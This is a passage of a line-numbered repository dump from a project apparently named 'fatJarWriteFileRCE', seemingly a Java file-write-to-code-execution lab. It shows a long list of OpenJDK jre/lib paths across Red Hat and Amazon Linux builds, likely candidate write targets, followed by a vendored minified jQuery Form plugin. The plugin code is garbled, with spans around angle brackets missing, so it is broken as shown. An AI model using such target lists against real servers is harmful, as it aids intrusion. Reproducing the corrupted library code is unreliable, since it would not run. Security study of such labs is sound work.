/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-2.b13.el7.x86_64/jre/lib/ 312 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-3.b17.el7.x86_64/jre/lib/ 313 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.102-4.b14.el7.x86_64/jre/lib/ 314 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-2.b14.el7.x86_64/jre/lib/ 315 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-7.b10.el7.x86_64/jre/lib/ 316 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-11.b12.el7.x86_64/jre/lib/ 317 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-1.b13.el6_6.x86_64/jre/lib/ 318 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-2.b17.el7_1.x86_64/jre/lib/ 319 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.77-0.b03.el6_7.x86_64/jre/lib/ 320 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.91-0.b14.el7_2.x86_64/jre/lib/ 321 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.101-3.b13.el7_2.x86_64/jre/lib/ 322 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.102-1.b14.el7_2.x86_64/jre/lib/ 323 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-0.b15.el6_8.x86_64/jre/lib/ 324 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-1.b15.el7_2.x86_64/jre/lib/ 325 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-2.b15.el7_3.x86_64/jre/lib/ 326 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.121-0.b13.el7_3.x86_64/jre/lib/ 327 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-0.b11.el6_9.x86_64/jre/lib/ 328 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-2.b11.el7_3.x86_64/jre/lib/ 329 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-3.b12.el7_3.x86_64/jre/lib/ 330 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-1.b16.el7_3.x86_64/jre/lib/ 331 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-3.b16.el6_9.x86_64/jre/lib/ 332 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.144-0.b01.el6_9.x86_64/jre/lib/ 333 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.144-0.b01.el7_4.x86_64/jre/lib/ 334 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.el6_9.x86_64/jre/lib/ 335 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.el7_4.x86_64/jre/lib/ 336 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-5.b12.el7_4.x86_64/jre/lib/ 337 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-0.b14.el7_4.x86_64/jre/lib/ 338 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-3.b14.el6_9.x86_64/jre/lib/ 339 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-3.b10.el6_9.x86_64/jre/lib/ 340 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.amzn2.x86_64/jre/lib/ 341 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el6_9.x86_64/jre/lib/ 342 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el7_5.x86_64/jre/lib/ 343 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.amzn2.x86_64/jre/lib/ 344 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el7_5.x86_64/jre/lib/ 345 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.amzn2.x86_64/jre/lib/ 346 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64/jre/lib/ 347 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-1.el7_6.x86_64/jre/lib/ 348 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-0.amzn2.x86_64/jre/lib/ 349 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-2.el7_6.x86_64/jre/lib/ 350 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.el7_6.x86_64/jre/lib/ 351 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222.b10-0.el7_6.x86_64/jre/lib/ 352 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/ 353 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el6_10.x86_64/jre/lib/ 354 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el6_10.x86_64/jre/lib/ 355 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.el6_10.x86_64/jre/lib/ 356 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.x86_64/jre/lib/ 357 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.x86_64/jre/lib/ 358 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.x86_64/jre/lib/ 359 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.el7_2.x86_64/jre/lib/ 360 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.el7_3.x86_64/jre/lib/ 361 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.x86_64/jre/lib/ 362 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.el7_3.x86_64/jre/lib/ 363 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre/lib/ 364 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.el7_5.x86_64/jre/lib/ 365 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.x86_64/jre/lib/ 366 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.x86_64/jre/lib/ 367 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.x86_64/jre/lib/ 368 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.x86_64/jre/lib/ 369 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.x86_64/jre/lib/ 370 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.x86_64/jre/lib/ 371 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.x86_64/jre/lib/ 372 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.x86_64/jre/lib/ 373 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.x86_64/jre/lib/ 374 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.x86_64/jre/lib/ 375 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-0.43.amzn1.x86_64/jre/lib/ 376 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.x86_64/jre/lib/ 377 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el7_5.x86_64-debug/jre/lib/ 378 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.x86_64/jre/lib/ 379 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64-debug/jre/lib/ 380 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el6_10.x86_64-debug/jre/lib/ 381 | 382 | ``` 383 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/static/jquery.form.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * jQuery Form Plugin 3 | * version: 4.1.0 4 | * Requires jQuery v1.7 or later 5 | * Copyright 2017 Kevin Morris 6 | * Copyright 2006 M. Alsup 7 | * Project repository: https://github.com/jquery-form/form 8 | * Dual licensed under the MIT and LGPLv3 licenses. 9 | * https://github.com/jquery-form/form#license 10 | */ 11 | !function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof module&&module.exports?module.exports=function(b,c){return void 0===c&&(c="undefined"!=typeof window?require("jquery"):require("jquery")(b)),a(c),c}:a(jQuery)}(function(a){"use strict";function b(b){var c=b.data;b.isDefaultPrevented()||(b.preventDefault(),a(b.target).closest("form").ajaxSubmit(c))}function c(b){var c=b.target,d=a(c);if(!d.is("[type=submit],[type=image]")){var e=d.closest("[type=submit]");if(0===e.length)return;c=e[0]}var f=c.form;if(f.clk=c,"image"===c.type)if(void 0!==b.offsetX)f.clk_x=b.offsetX,f.clk_y=b.offsetY;else if("function"==typeof a.fn.offset){var g=d.offset();f.clk_x=b.pageX-g.left,f.clk_y=b.pageY-g.top}else f.clk_x=b.pageX-c.offsetLeft,f.clk_y=b.pageY-c.offsetTop;setTimeout(function(){f.clk=f.clk_x=f.clk_y=null},100)}function d(){if(a.fn.ajaxSubmit.debug){var b="[jquery.form] "+Array.prototype.join.call(arguments,"");window.console&&window.console.log?window.console.log(b):window.opera&&window.opera.postError&&window.opera.postError(b)}}var e={};e.fileapi=void 0!==a('').get(0).files,e.formdata=void 0!==window.FormData;var f=!!a.fn.prop;a.fn.attr2=function(){if(!f)return this.attr.apply(this,arguments);var a=this.prop.apply(this,arguments);return a&&a.jquery||"string"==typeof a?a:this.attr.apply(this,arguments)},a.fn.ajaxSubmit=function(b,c,g,h){function i(c){var d,e,f=a.param(c,b.traditional).split("&"),g=f.length,h=[];for(d=0;d',z).val(k.extraData[j].value).appendTo(x)[0]):i.push(a('',z).val(k.extraData[j]).appendTo(x)[0]));k.iframeTarget||p.appendTo(A),q.attachEvent?q.attachEvent("onload",h):q.addEventListener("load",h,!1),setTimeout(b,15);try{x.submit()}catch(a){var m=document.createElement("form").submit;m.apply(x)}}finally{x.setAttribute("action",f),x.setAttribute("enctype",g),c?x.setAttribute("target",c):o.removeAttr("target"),a(i).remove()}}function h(b){if(!r.aborted&&!F){if(E=e(q),E||(d("cannot access response document"),b=2),1===b&&r)return r.abort("timeout"),void y.reject(r,"timeout");if(2===b&&r)return r.abort("server abort"),void y.reject(r,"error","server abort");if(E&&E.location.href!==k.iframeSrc||v){q.detachEvent?q.detachEvent("onload",h):q.removeEventListener("load",h,!1);var c,f="success";try{if(v)throw"timeout";var g="xml"===k.dataType||E.XMLDocument||a.isXMLDoc(E);if(d("isXml="+g),!g&&window.opera&&(null===E.body||!E.body.innerHTML)&&--G)return d("requeing onLoad callback, DOM not available"),void setTimeout(h,250);var i=E.body?E.body:E.documentElement;r.responseText=i?i.innerHTML:null,r.responseXML=E.XMLDocument?E.XMLDocument:E,g&&(k.dataType="xml"),r.getResponseHeader=function(a){return{"content-type":k.dataType}[a.toLowerCase()]},i&&(r.status=Number(i.getAttribute("status"))||r.status,r.statusText=i.getAttribute("statusText")||r.statusText);var j=(k.dataType||"").toLowerCase(),l=/(json|script|text)/.test(j);if(l||k.textarea){var n=E.getElementsByTagName("textarea")[0];if(n)r.responseText=n.value,r.status=Number(n.getAttribute("status"))||r.status,r.statusText=n.getAttribute("statusText")||r.statusText;else if(l){var o=E.getElementsByTagName("pre")[0],s=E.getElementsByTagName("body")[0];o?r.responseText=o.textContent?o.textContent:o.innerText:s&&(r.responseText=s.textContent?s.textContent:s.innerText)}}else"xml"===j&&!r.responseXML&&r.responseText&&(r.responseXML=H(r.responseText));try{D=J(r,j,k)}catch(a){f="parsererror",r.error=c=a||f}}catch(a){d("error caught: ",a),f="error",r.error=c=a||f}r.aborted&&(d("upload aborted"),f=null),r.status&&(f=r.status>=200&&r.status<300||304===r.status?"success":"error"),"success"===f?(k.success&&k.success.call(k.context,D,"success",r),y.resolve(r.responseText,"success",r),m&&a.event.trigger("ajaxSuccess",[r,k])):f&&(void 0===c&&(c=r.statusText),k.error&&k.error.call(k.context,r,f,c),y.reject(r,"error",c),m&&a.event.trigger("ajaxError",[r,k,c])),m&&a.event.trigger("ajaxComplete",[r,k]),m&&!--a.active&&a.event.trigger("ajaxStop"),k.complete&&k.complete.call(k.context,r,f),F=!0,k.timeout&&clearTimeout(w),setTimeout(function(){k.iframeTarget?p.attr("src",k.iframeSrc):p.remove(),r.responseXML=null},100)}}}var i,j,k,m,n,p,q,r,t,u,v,w,x=o[0],y=a.Deferred();if(y.abort=function(a){r.abort(a)},c)for(j=0;j',z),p.css({position:"absolute",top:"-1000px",left:"-1000px"})),q=p[0],r={aborted:0,responseText:null,responseXML:null,status:0,statusText:"n/a",getAllResponseHeaders:function(){},getResponseHeader:function(){},setRequestHeader:function(){},abort:function(b){var c="timeout"===b?"timeout":"aborted";d("aborting upload... "+c),this.aborted=1;try{q.contentWindow.document.execCommand&&q.contentWindow.document.execCommand("Stop")}catch(a){}p.attr("src",k.iframeSrc),r.error=c,k.error&&k.error.call(k.context,r,c,b),m&&a.event.trigger("ajaxError",[r,k,c]),k.complete&&k.complete.call(k.context,r,c)}},m=k.global,m&&0==a.active++&&a.event.trigger("ajaxStart"),m&&a.event.trigger("ajaxSend",[r,k]),k.beforeSend&&k.beforeSend.call(k.context,r,k)===!1)return k.global&&a.active--,y.reject(),y;if(r.aborted)return y.reject(),y;(t=x.clk)&&(u=t.name)&&!t.disabled&&(k.extraData=k.extraData||{},k.extraData[u]=t.value,"image"===t.type&&(k.extraData[u+".x"]=x.clk_x,k.extraData[u+".y"]=x.clk_y));var B=a("meta[name=csrf-token]").attr("content"),C=a("meta[name=csrf-param]").attr("content");C&&B&&(k.extraData=k.extraData||{},k.extraData[C]=B),k.forceSync?g():setTimeout(g,10);var D,E,F,G=50,H=a.parseXML||function(a,b){return window.ActiveXObject?(b=new ActiveXObject("Microsoft.XMLDOM"),b.async="false",b.loadXML(a)):b=(new DOMParser).parseFromString(a,"text/xml"),b&&b.documentElement&&"parsererror"!==b.documentElement.nodeName?b:null},I=a.parseJSON||function(a){return window.eval("("+a+")")},J=function(b,c,d){var e=b.getResponseHeader("content-type")||"",f=("xml"===c||!c)&&e.indexOf("xml")>=0,g=f?b.responseXML:b.responseText;return f&&"parsererror"===g.documentElement.nodeName&&a.error&&a.error("parsererror"),d&&d.dataFilter&&(g=d.dataFilter(g,c)),"string"==typeof g&&(("json"===c||!c)&&e.indexOf("json")>=0?g=I(g):("script"===c||!c)&&e.indexOf("javascript")>=0&&a.globalEval(g)),g};return y}if(!this.length)return d("ajaxSubmit: skipping submit process - no element selected"),this;var l,m,n,o=this;"function"==typeof b?b={success:b}:"string"==typeof b||b===!1&&arguments.length>0?(b={url:b,data:c,dataType:g},"function"==typeof h&&(b.success=h)):void 0===b&&(b={}),l=b.type||this.attr2("method"),m=b.url||this.attr2("action"),n="string"==typeof m?a.trim(m):"",n=n||window.location.href||"",n&&(n=(n.match(/^([^#]+)/)||[])[1]),b=a.extend(!0,{url:n,success:a.ajaxSettings.success,type:l||a.ajaxSettings.type,iframeSrc:/^https/i.test(window.location.href||"")?"javascript:false":"about:blank"},b);var p={};if(this.trigger("form-pre-serialize",[this,b,p]),p.veto)return d("ajaxSubmit: submit vetoed via form-pre-serialize trigger"),this;if(b.beforeSerialize&&b.beforeSerialize(this,b)===!1)return d("ajaxSubmit: submit aborted via beforeSerialize callback"),this;var q=b.traditional;void 0===q&&(q=a.ajaxSettings.traditional);var r,s=[],t=this.formToArray(b.semantic,s,b.filtering);if(b.data){var u=a.isFunction(b.data)?b.data(t):b.data;b.extraData=u,r=a.param(u,q)}if(b.beforeSubmit&&b.beforeSubmit(t,this,b)===!1)return d("ajaxSubmit: submit aborted via beforeSubmit callback"),this;if(this.trigger("form-submit-validate",[t,this,b,p]),p.veto)return d("ajaxSubmit: submit vetoed via form-submit-validate trigger"),this;var v=a.param(t,q);r&&(v=v?v+"&"+r:r),"GET"===b.type.toUpperCase()?(b.url+=(b.url.indexOf("?")>=0?"&":"?")+v,b.data=null):b.data=v;var w=[];if(b.resetForm&&w.push(function(){o.resetForm()}),b.clearForm&&w.push(function(){o.clearForm(b.includeHidden)}),!b.dataType&&b.target){var x=b.success||function(){};w.push(function(c){var d=b.replaceTarget?"replaceWith":"html";a(b.target)[d](c).each(x,arguments)})}else b.success&&(a.isArray(b.success)?a.merge(w,b.success):w.push(b.success));if(b.success=function(a,c,d){for(var e=b.context||this,f=0,g=w.length;f0,C="multipart/form-data",D=o.attr("enctype")===C||o.attr("encoding")===C,E=e.fileapi&&e.formdata;d("fileAPI :"+E);var F,G=(B||D)&&!E;b.iframe!==!1&&(b.iframe||G)?b.closeKeepAlive?a.get(b.closeKeepAlive,function(){F=k(t)}):F=k(t):F=(B||D)&&E?j(t):a.ajax(b),o.removeData("jqxhr").data("jqxhr",F);for(var H=0;H0)&&(e={url:e,data:f,dataType:g},"function"==typeof h&&(e.success=h)),e=e||{},e.delegation=e.delegation&&a.isFunction(a.fn.on),!e.delegation&&0===this.length){var i={s:this.selector,c:this.context};return!a.isReady&&i.s?(d("DOM not ready, queuing ajaxForm"),a(function(){a(i.s,i.c).ajaxForm(e)}),this):(d("terminating; zero elements found by selector"+(a.isReady?"":" (DOM not ready)")),this)}return e.delegation?(a(document).off("submit.form-plugin",this.selector,b).off("click.form-plugin",this.selector,c).on("submit.form-plugin",this.selector,e,b).on("click.form-plugin",this.selector,e,c),this):this.ajaxFormUnbind().on("submit.form-plugin",e,b).on("click.form-plugin",e,c)},a.fn.ajaxFormUnbind=function(){return this.off("submit.form-plugin click.form-plugin")},a.fn.formToArray=function(b,c,d){var f=[];if(0===this.length)return f;var g,h=this[0],i=this.attr("id"),j=b||void 0===h.elements?h.getElementsByTagName("*"):h.elements;if(j&&(j=a.makeArray(j)),i&&(b||/(Edge|Trident)\//.test(navigator.userAgent))&&(g=a(':input[form="'+i+'"]').get(),g.length&&(j=(j||[]).concat(g))),!j||!j.length)return f;a.isFunction(d)&&(j=a.map(j,d));var k,l,m,n,o,p,q;for(k=0,p=j.length;k